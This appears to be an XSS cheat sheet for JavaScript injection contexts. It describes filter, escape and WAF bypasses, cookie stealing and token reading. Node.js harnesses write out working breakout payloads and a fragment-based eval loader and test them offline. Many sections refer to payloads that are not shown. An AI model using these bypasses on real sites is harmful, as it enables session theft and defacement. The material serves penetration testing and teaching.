Javascript Injections

This section covers the payloads needed to prove an XSS vulnerability when input lands in Javascript code.

Simple Javascript Injection

Use when input lands in a script block inside a string-delimited value. It is also the route to take when script tags are filtered, since no new tag is needed: the payload closes the existing string and the code runs in the original block.

Always check which quote delimits the value (double or single) and use the same quote in the payload.

---------------------------------------------------------------

Injection in Javascript Variable – Backticks Delimiter

Use when input lands in a script block inside a backtick-delimited value (a template literal). It also covers the case where script tags are filtered or the value is first placed in an attribute with angle brackets encoded and then used inside the string, since the break-out needs no HTML characters.

Always check which quote delimits the value (double or single) and use the same quote in the payload.

---------------------------------------------------------------

Javascript Injection - Escape Bypass

Use when input lands in a script block inside a string-delimited value, but quotes are escaped with a backslash.

In the previous case, if the quote responsible for breaking out of the variable's value is escaped with a backslash (\), the injection fails: the script stays syntactically valid, but the escaped quote is now part of the string literal and the payload never leaves it. The trick is to escape the escape. A leading backslash in the payload pairs with the one the filter adds, so the quote that follows is live again and closes the string.

Always check which quote delimits the value (double or single) and use the same quote in the payload.

---------------------------------------------------------------

Javascript Injection - Quotes Encoded Filtered Bypass

Use when input lands in a script block inside a string-delimited value, but a filter encodes the quotes so the string cannot be closed with a literal quote.

Always check which quote delimits the value (double or single) and use the same quote in the payload.

---------------------------------------------------------------

Javascript Injection - Logical Block

Use the 1st or 2nd payload when input lands in a script block, inside a string-delimited value, and inside a single logical block such as a function body or a conditional (if, else, etc.). There a trailing // comment would also swallow the block's closing brace and break the syntax, so the payload has to restore or close the block instead. If the quote is escaped with a backslash, use the 3rd or 4th payload.

---------------------------------------------------------------

Javascript Injection - Quoteless

Use when the same input is reflected more than once in one line of JS code.

---------------------------------------------------------------

Placeholder Injection in Template Literal

Use when input lands inside a backtick-delimited string (a template literal) or in a template engine that evaluates ${} placeholders. It works even when quotes are escaped with a backslash, because the placeholder needs no quotes: the expression inside ${} is evaluated when the literal is built.

---------------------------------------------------------------

Browser Notification

Use as an alternative to alert, prompt, and confirm popups. It requires the user to accept the notification permission prompt (1st payload), but once the user has already granted that permission for the site, the 2nd one can be used directly.

---------------------------------------------------------------

JS Injection - Reference Error Fix

Use to fix the syntax of hanging Javascript code left around the injection. Check the Console tab in the browser's Developer Tools (F12) for the respective ReferenceError and replace the variable and function names in the payload with the ones it reports.

---------------------------------------------------------------

Alert without Parentheses (Strings Only)

Use in an HTML vector or Javascript injection when parentheses are not allowed and a simple alert box is enough.

---------------------------------------------------------------

JS Injection without Parentheses

Use in an HTML vector or Javascript injection when parentheses are not allowed and the PoC must return some information from the target.

---------------------------------------------------------------

Alert Injection Variations

All the regular ways to break out of delimiters and inject alert(1) while repairing the remaining syntax (without using comments).

---------------------------------------------------------------

JS Injection without Alphabetic Chars

Use when alphabetic characters are not allowed. The following is alert(1).

---------------------------------------------------------------

Alert Obfuscation

Use when the alert keyword is filtered.

Avoiding keywords and specific substrings:

Use to defeat several regular expression (regex) filters. It can be combined with the previous alternatives (above). The shortest option, “top”, can also be replaced by “window”, “parent”, “self” or “this”, depending on context.

Calling functions

alert`1` : tagged template literal syntax
alert.apply(this,[1]) : using Function.prototype.apply
alert.call(this,1) : using Function.prototype.call
alert(1) : obviously, but included for completeness
[1].find(alert) : using alert as a predicate
[1].filter(alert) : using alert as a predicate

---------------------------------------------------------------

Alert Obfuscation - Optional Chaining

Use to defeat several regular expression (regex) filters that look for alert( as a whole. It can be combined with the previous alternatives (above).
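The following is an added example, not a payload list from the original cheat sheet. It runs each alert-calling form from the two sections above against a recording stand-in under Node.js, so you can see how many times alert() fires and which first argument it receives, that is, what the popup would actually display. The object `win` is a hypothetical stand-in for the browser global that top, window and self refer to in a page; in a real page the same property lookups hit the real one.

```javascript
// Added example: exercise alert-calling and keyword-free forms offline.
// `win` is a stand-in for the browser global; top/self/window all alias it.
function probe(expr) {
  const received = [];
  const win = { alert: (...args) => { received.push(args); } };
  new Function('alert', 'top', 'self', 'window', `return (${expr});`)(win.alert, win, win, win);
  // The popup shows String(firstArgument), so record that too.
  return { calls: received.length, shown: received.map((a) => String(a[0])) };
}

// Ways of calling alert that avoid the literal alert(1) pattern.
const callForms = {
  'alert(1)': probe('alert(1)'),
  'alert`1`': probe('alert`1`'),                   // argument is the strings array ["1"]
  'alert.call(this,1)': probe('alert.call(this,1)'),
  'alert.apply(this,[1])': probe('alert.apply(this,[1])'),
  '[1].find(alert)': probe('[1].find(alert)'),     // called once as (1, 0, [1])
  '[1].filter(alert)': probe('[1].filter(alert)'),
  'alert?.(1)': probe('alert?.(1)'),               // optional chaining call
};

// Ways of reaching alert without ever writing the keyword itself.
const keywordFree = {
  'top["al"+"ert"](1)': probe('top["al"+"ert"](1)'),
  'self[/al/.source+/ert/.source](1)': probe('self[/al/.source+/ert/.source](1)'),
  'window["\\x61lert"](1)': probe('window["\\x61lert"](1)'),
  'top[8680439..toString(30)](1)': probe('top[8680439..toString(30)](1)'),  // "alert" in base 30
  'top[String.fromCharCode(97,108,101,114,116)](1)': probe('top[String.fromCharCode(97,108,101,114,116)](1)'),
};

for (const [name, r] of Object.entries({ ...callForms, ...keywordFree })) {
  console.log(name.padEnd(50), 'calls:', r.calls, 'shows:', JSON.stringify(r.shown));
}
```

Every form fires exactly once and shows "1", including the predicate forms, which pass extra arguments (index and array) that alert ignores, and the tagged template, whose first argument is an array that stringifies to "1".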

---------------------------------------------------------------

Alert Alternative – Write & Writeln

Use as an alternative to alert, prompt, and confirm. Within an HTML event handler attribute the bare write() form works as is, because the handler's scope chain includes document, but in a plain JS injection the full “document.write” form is required. Replace “&” with “%26” and “#” with “%23” when the payload travels in a URL. write can be replaced by writeln.

---------------------------------------------------------------

JS Injection - Escaping From Functions and Methods

Use to execute JS code when the injection lands inside a function or a method of an object that is not executed automatically (nothing calls it). The payload breaks out of the function/method so the code runs at load time, and then fixes the remaining syntax; “()=>” can be replaced by “function()” if needed.
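The following is an added example, not code from the original cheat sheet. It is a Node.js harness that rebuilds a target's script block around the reflected value, applies the server-side filter under test and evaluates the result with a recording stand-in for alert(). It covers the Simple Javascript Injection, Escape Bypass, Logical Block, Placeholder Injection in Template Literal and Escaping From Functions sections above, and for each context answers the two questions that matter: does the script still parse, and does alert() actually run? The script templates, the quote-escaping filter and the `ok` guard variable are all hypothetical.

```javascript
// Added example: rebuild the sink, apply the filter, evaluate with a fake alert().
const noFilter = (s) => s;
// Backslash-escapes quotes the way addslashes() or a naive sanitizer would.
const escapeQuotes = (s) => s.replace(/["']/g, (m) => '\\' + m);

function runSink(template, filter, payload) {
  const code = template.replace('INPUT', filter(payload));
  const alerts = [];
  try {
    // `ok` stands for whatever condition guards a logical block in the page.
    new Function('alert', 'ok', code)((...args) => { alerts.push(args); }, true);
    return { code, valid: true, fired: alerts.length > 0 };
  } catch (e) {
    return { code, valid: !(e instanceof SyntaxError), fired: false, error: e.name };
  }
}

// Simple Javascript Injection: close the string, call alert, comment out the rest.
const simple = runSink('var x = "INPUT";', noFilter, '";alert(1)//');

// Escape Bypass. The naive payload stays inside the literal once its quote is
// escaped (the script is valid, nothing runs) ...
const escapedStaysInside = runSink('var x = "INPUT";', escapeQuotes, '";alert(1)//');
// ... but a leading backslash pairs with the one the filter adds, so the quote
// is live again and the code becomes: var x = "\\";alert(1)//";
const escapedBypass = runSink('var x = "INPUT";', escapeQuotes, '\\";alert(1)//');

// Logical Block. A trailing // also swallows the block's closing brace, which
// is a SyntaxError; the payload must restore the assignment or close the block.
const block = 'if (ok) { var x = "INPUT"; }';
const blockBroken = runSink(block, noFilter, '";alert(1)//');
const blockRestored = runSink(block, noFilter, '";alert(1);x="');
const blockClosed = runSink(block, noFilter, '";alert(1)}//');

// Placeholder Injection in Template Literal: escaping quotes is irrelevant,
// the ${} placeholder evaluates its expression while the literal is built.
const placeholder = runSink('var x = `INPUT`;', escapeQuotes, '${alert(1)}');

// Escaping From Functions. The value sits in a function the page never calls,
// so a payload that only repairs the string parses fine but never executes.
const fn = 'function onSubmit() { var x = "INPUT"; }';
const fnStaysInside = runSink(fn, noFilter, '";alert(1);x="');
// Close the string and the function body, run at load, comment out the tail.
const fnBreakOut = runSink(fn, noFilter, '";}alert(1);//');
// Same without comments: re-open a function so the original tail  "; }  closes it.
const fnBreakOutNoComment = runSink(fn, noFilter, '";}alert(1);function _(){var y="');

const results = { simple, escapedStaysInside, escapedBypass, blockBroken, blockRestored,
  blockClosed, placeholder, fnStaysInside, fnBreakOut, fnBreakOutNoComment };
for (const [name, r] of Object.entries(results)) {
  console.log(name.padEnd(20), r.valid ? 'parses      ' : 'SYNTAX ERROR',
    r.fired ? 'alert fired' : 'no alert   ', '<-', r.code);
}
```

Run it with node and read the table: the cases that parse but do not fire (escaped quote, value inside an uncalled function) are exactly the ones where a payload looks right in the page source yet produces no popup, and the SyntaxError row shows why the logical-block payloads cannot end in a bare // comment.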

---------------------------------------------------------------

Alert Alternative – Open Pseudo-Protocol

Use as an alternative to alert, prompt, and confirm. The tricks above apply here as well.

---------------------------------------------------------------

Jump to URL Fragment

Use when you need to hide characters of your payload that would otherwise trigger a WAF, for example. The payload is placed after the URL fragment (#), which the browser never sends to the server, so a server-side WAF never sees it; the injected code then reads it back from the fragment in the respective payload format.
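The following is an added example, not a payload from the original cheat sheet. It shows, with Node.js's WHATWG URL parser, what actually travels to the server when the dangerous part of a payload is moved behind the '#', and then simulates the page-side loader reading it back. The target host, parameter name and the eval-based loader are hypothetical.

```javascript
// Added example: split a crafted URL into the part the server sees and the
// fragment the page reads, then run the fragment as the loader would.
function splitRequest(fullUrl) {
  const u = new URL(fullUrl);
  return {
    // The request target the server (and any WAF in front of it) receives.
    onTheWire: u.pathname + u.search,
    // What location.hash.slice(1) yields in the page. Percent-encoding is kept,
    // so a sink such as eval(location.hash.slice(1)) sees it raw ...
    fragment: u.hash.slice(1),
    // ... and needs decodeURIComponent() if anything had to be encoded.
    decoded: decodeURIComponent(u.hash.slice(1)),
  };
}

// Simulate the loader: evaluate the (decoded) fragment with a recording alert()
// and a stand-in document object, since there is no DOM under Node.
function runFragment(fullUrl) {
  const fired = [];
  const fakeDocument = { domain: 'target.example' };
  new Function('alert', 'document', splitRequest(fullUrl).decoded)((v) => fired.push(v), fakeDocument);
  return fired;
}

// The reflected parameter carries only a small loader; the real code is in the fragment.
const crafted = 'https://target.example/search?q=%3Csvg%20onload%3Deval(location.hash.slice(1))%3E#alert(document.domain)';
const parts = splitRequest(crafted);

// Same thing with the fragment percent-encoded: the raw hash differs, the decoded one does not.
const craftedEncoded = 'https://target.example/search?q=%3Csvg%20onload%3Deval(location.hash.slice(1))%3E#alert%28document.domain%29';
const partsEncoded = splitRequest(craftedEncoded);

console.log('server sees :', parts.onTheWire);
console.log('page reads  :', parts.fragment, '/', partsEncoded.fragment);
console.log('alert shows :', runFragment(crafted)[0], '/', runFragment(craftedEncoded)[0]);
```

The request line never contains the string alert, which is the whole point: a WAF inspecting the request cannot match on what it never receives. Note that if you percent-encode characters in the fragment, the loader must decode them first, since the browser hands the hash over as-is.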

---------------------------------------------------------------

Javascript Alternative Comments

Use when regular Javascript comments (//) are not allowed, escaped, or removed.

---------------------------------------------------------------

URL Validation Bypass

Use to bypass PHP's filter_var() with the FILTER_VALIDATE_URL filter, or similar URL validators.

---------------------------------------------------------------

URL Validation Bypass – Query Required

Use to bypass PHP's filter_var() with FILTER_VALIDATE_URL and the FILTER_FLAG_QUERY_REQUIRED flag (a query string must be present), or similar.

---------------------------------------------------------------

URL Validation Bypass - Alternative to %250A or %250D

Use when %250A or %250D (double URL-encoded line feed and carriage return) are not allowed.

---------------------------------------------------------------

JS Injection Bypass inside Event Handler

Use when injection is possible inside an event handler, as in “onevent=someFunction('HERE')”, and quotes are escaped. The HTML parser decodes character references in the attribute before the Javascript engine sees the handler, so a quote written as a character reference is not escaped by the filter yet still closes the string.
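The following is an added example, not a payload from the original cheat sheet. It models the two parsing stages an inline handler goes through under Node.js: the server backslash-escapes quotes in the reflected value, then the browser's HTML parser decodes character references in the attribute, and only then does the Javascript engine compile the handler. The handler template, someFunction and the quote-escaping filter are hypothetical, and the decoder only handles numeric character references.

```javascript
// Added example: server filter -> HTML attribute decoding -> JS evaluation.

// Stage 1: the server's filter, applied to the raw input.
const escapeQuotes = (s) => s.replace(/["']/g, (m) => '\\' + m);

// Stage 2: the HTML parser decoding numeric character references (&#NN; and
// &#xHH;) inside the attribute value. Named references are left out for brevity.
const htmlDecodeAttr = (s) =>
  s.replace(/&#(\d+);|&#x([0-9a-f]+);/gi, (m, dec, hex) =>
    String.fromCodePoint(dec ? Number(dec) : parseInt(hex, 16)));

// Stage 3: what the JS engine compiles when the event fires.
function simulateHandler(input) {
  const attr = `someFunction('${escapeQuotes(input)}')`; // onevent="..." as served
  const js = htmlDecodeAttr(attr);                        // as seen by the JS engine
  const fired = [];
  try {
    new Function('alert', 'someFunction', js)((v) => fired.push(v), () => {});
    return { attr, js, valid: true, fired: fired.length > 0 };
  } catch (e) {
    return { attr, js, valid: !(e instanceof SyntaxError), fired: false };
  }
}

// A literal quote gets escaped and the payload stays inside the string.
const literalQuote = simulateHandler("');alert(1)//");
// A quote written as &#39; or &#x27; passes the filter untouched and is decoded
// by the HTML parser afterwards, so the string closes and alert(1) runs.
const entityQuote = simulateHandler('&#39;);alert(1)//');
const hexEntityQuote = simulateHandler('&#x27;);alert(1)//');

for (const r of [literalQuote, entityQuote, hexEntityQuote]) {
  console.log(r.fired ? 'alert fired' : 'no alert   ', '| served:', r.attr, '| compiled:', r.js);
}
```

The bypass depends on the filter leaving & alone: a server that HTML-encodes the ampersand as well (so &#39; arrives as &amp;#39;) closes it.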

---------------------------------------------------------------

Simple Virtual Defacement

Use to change how the site appears to the victim by supplying HTML code. In the example below a “Not Found” message is displayed.

---------------------------------------------------------------

Cookie Stealing

Use to get all cookies set by the target site for the victim user. It cannot read cookies protected by the HttpOnly flag. Encode “+” as “%2B” in URLs.

---------------------------------------------------------------

Alternative PoC - Shake Your Body

Use to shake all the visible elements of the page as a vivid visualization of the vulnerability.

---------------------------------------------------------------

Alternative PoC - Alert Hidden Values

Use to prove that hidden HTML values such as tokens and nonces in the target page can be read and stolen.

---------------------------------------------------------------
